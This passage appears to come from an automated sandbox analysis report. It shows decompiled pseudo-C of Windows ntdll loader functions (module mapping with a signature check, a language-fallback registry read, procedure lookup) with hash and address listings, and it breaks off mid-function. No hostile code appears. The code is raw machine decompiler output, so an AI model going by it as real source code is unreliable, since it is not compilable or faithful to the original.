                                                                                    0x009c894c
                                                                                    0x00000000
                                                                                    0x009c8870
                                                                                    0x009c887b
                                                                                    0x009c887d
                                                                                    0x009c887f
                                                                                    0x009c8881
                                                                                    0x009c8884
                                                                                    0x009c8884
                                                                                    0x009c8886
                                                                                    0x009c8889
                                                                                    0x009c888c
                                                                                    0x009c888e
                                                                                    0x009c8891
                                                                                    0x009c8891
                                                                                    0x009c8898
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x009c889a
                                                                                    0x009c889b
                                                                                    0x009c889e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x009c88a0
                                                                                    0x009c88a8
                                                                                    0x009c88b0
                                                                                    0x009c88b2
                                                                                    0x009c88d3
                                                                                    0x009c88d5
                                                                                    0x00000000
                                                                                    0x009c88d7
                                                                                    0x009c88db
                                                                                    0x009c88dc
                                                                                    0x009c88e0
                                                                                    0x009c88e8
                                                                                    0x009c88ee
                                                                                    0x009c88f0
                                                                                    0x009c88f3
                                                                                    0x009c88fc
                                                                                    0x009c8901
                                                                                    0x009c8906
                                                                                    0x009c890c
                                                                                    0x009c890c
                                                                                    0x009c890f
                                                                                    0x009c8916
                                                                                    0x009c8917
                                                                                    0x009c8918
                                                                                    0x009c8919
                                                                                    0x009c891a
                                                                                    0x009c891f
                                                                                    0x009c8921
                                                                                    0x00a19c52
                                                                                    0x00a19c55
                                                                                    0x00a19c5b
                                                                                    0x00a19cac
                                                                                    0x00a19cc0
                                                                                    0x00a19cc0
                                                                                    0x00a19c55
                                                                                    0x009c8927
                                                                                    0x009c8927
                                                                                    0x009c892f
                                                                                    0x009c8933
                                                                                    0x00000000
                                                                                    0x009c88f5
                                                                                    0x009c88f5
                                                                                    0x00000000
                                                                                    0x009c88f7
                                                                                    0x009c88f7
                                                                                    0x009c88fa
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x009c88fa
                                                                                    0x009c88f5
                                                                                    0x009c88f3
                                                                                    0x00000000
                                                                                    0x009c88d5
                                                                                    0x00000000
                                                                                    0x009c88b2
                                                                                    0x009c88c9
                                                                                    0x00000000
                                                                                    0x009c88c9
                                                                                    0x009c887f
                                                                                    0x009c886a
                                                                                    0x009c8857
                                                                                    0x009c8852
                                                                                    0x009c88bf
                                                                                    0x009c88bf
                                                                                    0x009c87aa
                                                                                    0x009c87ad
                                                                                    0x009c87ae
                                                                                    0x009c87b4
                                                                                    0x009c87b5
                                                                                    0x009c87b6
                                                                                    0x009c87b8
                                                                                    0x009c87bd
                                                                                    0x009c87c1
                                                                                    0x009c87f4
                                                                                    0x009c87fa
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x009c87c1
                                                                                    0x00000000

                                                                                    Strings
                                                                                    • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 00A19C18
                                                                                    • LdrpDoPostSnapWork, xrefs: 00A19C1E
                                                                                    • minkernel\ntdll\ldrsnap.c, xrefs: 00A19C28
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.314955752.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                                    • API String ID: 2994545307-1948996284
                                                                                    • Opcode ID: fedede27e8104331a31d67a212dfebb0e4f1a00b674b492eb78c5d9aea811a70
                                                                                    • Instruction ID: 90ff41ddefe9fcd4e746cdb35b1a9b7b460eefafba881534586fc3e605c3bfee
                                                                                    • Opcode Fuzzy Hash: fedede27e8104331a31d67a212dfebb0e4f1a00b674b492eb78c5d9aea811a70
                                                                                    • Instruction Fuzzy Hash: BA91CE71E00216ABDF18DF59C881FBBB3B9FF85310B54406DE915AB691EB30AD41CB92
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 009C7E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 98%
                                                                                    			E009C7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E009CCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E009BC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0xaa5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E00A35510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0xaa5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E009D7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E009D7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E00A37016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E009D7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E009D7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E00A37016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E009EA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E009BB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                                                                    0x009c7e4c
                                                                                    0x009c7e50
                                                                                    0x009c7e55
                                                                                    0x009c7e58
                                                                                    0x009c7e5d
                                                                                    0x009c7e71
                                                                                    0x009c7f33
                                                                                    0x009c7e77
                                                                                    0x009c7e77
                                                                                    0x009c7e79
                                                                                    0x009c7e79
                                                                                    0x009c7e7e
                                                                                    0x009c7f45
                                                                                    0x00a19848
                                                                                    0x00000000
                                                                                    0x00a19848
                                                                                    0x009c7f4e
                                                                                    0x009c7f53
                                                                                    0x009c7f5a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00a1985a
                                                                                    0x00a19862
                                                                                    0x00a19866
                                                                                    0x00000000
                                                                                    0x00a1986c
                                                                                    0x00000000
                                                                                    0x00a1986c
                                                                                    0x009c7e84
                                                                                    0x009c7e84
                                                                                    0x009c7e8d
                                                                                    0x00a19871
                                                                                    0x009c7eb8
                                                                                    0x009c7ec0
                                                                                    0x009c7ec0
                                                                                    0x009c7e9a
                                                                                    0x00a1987e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00a19884
                                                                                    0x00a1988b
                                                                                    0x00a198a7
                                                                                    0x00a198ac
                                                                                    0x00a198b1
                                                                                    0x00a198b6
                                                                                    0x00a198b8
                                                                                    0x00a198b8
                                                                                    0x00a198b9
                                                                                    0x00000000
                                                                                    0x00a198b9
                                                                                    0x009c7ea0
                                                                                    0x009c7ea7
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x009c7eac
                                                                                    0x009c7eb1
                                                                                    0x009c7ec6
                                                                                    0x009c7ed0
                                                                                    0x00a198cc
                                                                                    0x009c7ed6
                                                                                    0x009c7ed6
                                                                                    0x009c7ed6
                                                                                    0x009c7ede
                                                                                    0x009c7ee3
                                                                                    0x00a198e3
                                                                                    0x00a198f0
                                                                                    0x00a19902
                                                                                    0x00a198f2
                                                                                    0x00a198fb
                                                                                    0x00a198fb
                                                                                    0x00a19907
                                                                                    0x00a1991d
                                                                                    0x00a1991d
                                                                                    0x00a19907
                                                                                    0x00a198e3
                                                                                    0x009c7ef0
                                                                                    0x009c7f14
                                                                                    0x009c7f14
                                                                                    0x009c7f1e
                                                                                    0x00a19946
                                                                                    0x009c7f24
                                                                                    0x009c7f24
                                                                                    0x009c7f24
                                                                                    0x009c7f2c
                                                                                    0x00a1996a
                                                                                    0x00a19975
                                                                                    0x00a19975
                                                                                    0x00a1997e
                                                                                    0x00a19993
                                                                                    0x00a19993
                                                                                    0x00a1997e
                                                                                    0x00000000
                                                                                    0x009c7ef2
                                                                                    0x009c7efc
                                                                                    0x009c7f0a
                                                                                    0x009c7f0e
                                                                                    0x00a19933
                                                                                    0x00000000
                                                                                    0x00a19933
                                                                                    0x00000000
                                                                                    0x009c7f0e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x009c7eb1

                                                                                    Strings
                                                                                    • minkernel\ntdll\ldrmap.c, xrefs: 00A198A2
                                                                                    • Could not validate the crypto signature for DLL %wZ, xrefs: 00A19891
                                                                                    • LdrpCompleteMapModule, xrefs: 00A19898
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.314955752.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                    • API String ID: 0-1676968949
                                                                                    • Opcode ID: 8d8fe79ecffd632f4dca0967780042d8d719eff37d65f14d5b7c06740f8749d5
                                                                                    • Instruction ID: c02ef14240d83a6d305ec1002e1282228d7ab825370099638fb63e254c084def
                                                                                    • Opcode Fuzzy Hash: 8d8fe79ecffd632f4dca0967780042d8d719eff37d65f14d5b7c06740f8749d5
                                                                                    • Instruction Fuzzy Hash: D8512332A087449BEB25CBA9C994F6ABBE8EF41314F14059DF8519B3E1D734ED40CB52
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 009BE620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 93%
                                                                                    			E009BE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E009BF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E009F95D0();
						}
						if(_t78 != 0) {
							L009D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E009FFA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E009FBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E009F9600();
					if(_t97 < 0) {
						goto L6;
					}
					E009FBB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L009BF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E009FBB40(_t83, _t102 + 0x24, _t78);
								if(L009C43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E009FBB40(_t84, _t102 + 0x24, _t94);
									if(L009C43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                                                                    0x009be620
                                                                                    0x009be628
                                                                                    0x009be62f
                                                                                    0x009be631
                                                                                    0x009be635
                                                                                    0x009be637
                                                                                    0x009be63e
                                                                                    0x00a15503
                                                                                    0x00a15503
                                                                                    0x009be64c
                                                                                    0x009be64c
                                                                                    0x009be651
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x009be661
                                                                                    0x009be665
                                                                                    0x00a1542a
                                                                                    0x009be715
                                                                                    0x009be71a
                                                                                    0x009be71c
                                                                                    0x009be720
                                                                                    0x009be720
                                                                                    0x009be727
                                                                                    0x009be736
                                                                                    0x009be736
                                                                                    0x009be743
                                                                                    0x009be743
                                                                                    0x009be673
                                                                                    0x009be678
                                                                                    0x009be67d
                                                                                    0x009be682
                                                                                    0x009be685
                                                                                    0x009be692
                                                                                    0x009be69b
                                                                                    0x009be6a3
                                                                                    0x009be6ad
                                                                                    0x009be6b1
                                                                                    0x009be6b2
                                                                                    0x009be6bb
                                                                                    0x009be6bf
                                                                                    0x009be6c0
                                                                                    0x009be6c8
                                                                                    0x009be6cc
                                                                                    0x009be6d5
                                                                                    0x009be6d9
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x009be6e5
                                                                                    0x009be6ea
                                                                                    0x009be6f9
                                                                                    0x009be70b
                                                                                    0x009be70f
                                                                                    0x00a15439
                                                                                    0x00a1545e
                                                                                    0x00a1545e
                                                                                    0x00000000
                                                                                    0x00a1545e
                                                                                    0x00a1543b
                                                                                    0x00a1543e
                                                                                    0x00a15440
                                                                                    0x00a15445
                                                                                    0x00a15472
                                                                                    0x00a15475
                                                                                    0x00a1548d
                                                                                    0x00a15493
                                                                                    0x00a154a9
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00a154ab
                                                                                    0x00a154b4
                                                                                    0x00a154bc
                                                                                    0x00a154c8
                                                                                    0x00a154de
                                                                                    0x00a154fb
                                                                                    0x00a154e0
                                                                                    0x00a154e6
                                                                                    0x00a154eb
                                                                                    0x00a154eb
                                                                                    0x00a154de
                                                                                    0x00000000
                                                                                    0x00a154bc
                                                                                    0x00a15477
                                                                                    0x00a1547a
                                                                                    0x00a15480
                                                                                    0x00a15483
                                                                                    0x00a15486
                                                                                    0x00a1548b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00a1548b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00a15447
                                                                                    0x00a15447
                                                                                    0x00a15447
                                                                                    0x00a15447
                                                                                    0x00a1544e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00a15450
                                                                                    0x00a15452
                                                                                    0x00a15455
                                                                                    0x00a1545a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00a1545c
                                                                                    0x00a1546a
                                                                                    0x00a1546d
                                                                                    0x00a1546f
                                                                                    0x00000000
                                                                                    0x00a1546f
                                                                                    0x009be70f

                                                                                    Strings
                                                                                    • InstallLanguageFallback, xrefs: 009BE6DB
                                                                                    • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 009BE68C
                                                                                    • @, xrefs: 009BE6C0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.314955752.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                    • API String ID: 0-1757540487
                                                                                    • Opcode ID: dd4107f3b2b8b313a6b3747ba53fb23cd097a7a29453cb48c4e407ec82a1f10b
                                                                                    • Instruction ID: 3dec59bd09506623ecdcd6cccbfd585ba61d7939a0a1798c19d5b12880550cc2
                                                                                    • Opcode Fuzzy Hash: dd4107f3b2b8b313a6b3747ba53fb23cd097a7a29453cb48c4e407ec82a1f10b
                                                                                    • Instruction Fuzzy Hash: 9C519CB6908355DBC714DF64C480BABB3E9AFC8724F15092EF985D7240EB34DE8487A2
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 009CD5E0, Relevance: 2.9, Strings: 2, Instructions: 353COMMONCrypto
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 87%
                                                                                    			E009CD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0xaad360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E009C6600(0xaa52d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0xaa7b9c; // 0x0
							_t281 = L009D4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E009FF3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0xaa7b90; // 0x779c0000
								if(_t384 == 0) {
									_t353 =  *0xaa7b8c; // 0x492a60
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E009D2280(_t200, 0xaa84d8);
									_t277 =  *0xaa85f4; // 0x492f50
									_t351 =  *0xaa85f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0x492ee8
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E009CFFB0(_t287, _t353, 0xaa84d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E00A0CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E009C6600(0xaa52d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E009C7926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0xaab239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E00A3E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0xaa8472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														asm("ror edi, cl");
														 *0xaab1e0( &_v192, _t353, _v168, 0, _v180);
														 *( *0xaab218 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E009D2280(_t250, 0xaa84d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L009F3898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E009CFFB0(_t293, _t353, 0xaa84d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E009F37F5(_t353, 0);
																}
																E009F0413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E009E9B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E009E02D6(_t174);
																}
																L009D77F0( *0xaa7b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E009EC277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L009CEC7F(_t353);
										L009E19B8(_t287, 0, _t353, 0);
										_t200 = E009BF4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L009D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0 || ( *0xaab2f8 |  *0xaab2fc) == 0 || ( *0xaab2e4 & 0x00000001) != 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E009FB640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_v200 = 0;
									if(( *0xaab2ec >> 0x00000008 & 0x00000003) == 3) {
										_t355 = _v168;
										_t342 =  &_v208;
										_t208 = E00A66B68(_v168,  &_v208, _v168, __eflags);
										__eflags = _t208 - 1;
										if(_t208 == 1) {
											goto L46;
										} else {
											__eflags = _v208 & 0x00000010;
											if((_v208 & 0x00000010) == 0) {
												goto L46;
											} else {
												_t342 = 4;
												_t366 = E00A66AEB(_t355, 4,  &_v216);
												__eflags = _t366;
												if(_t366 >= 0) {
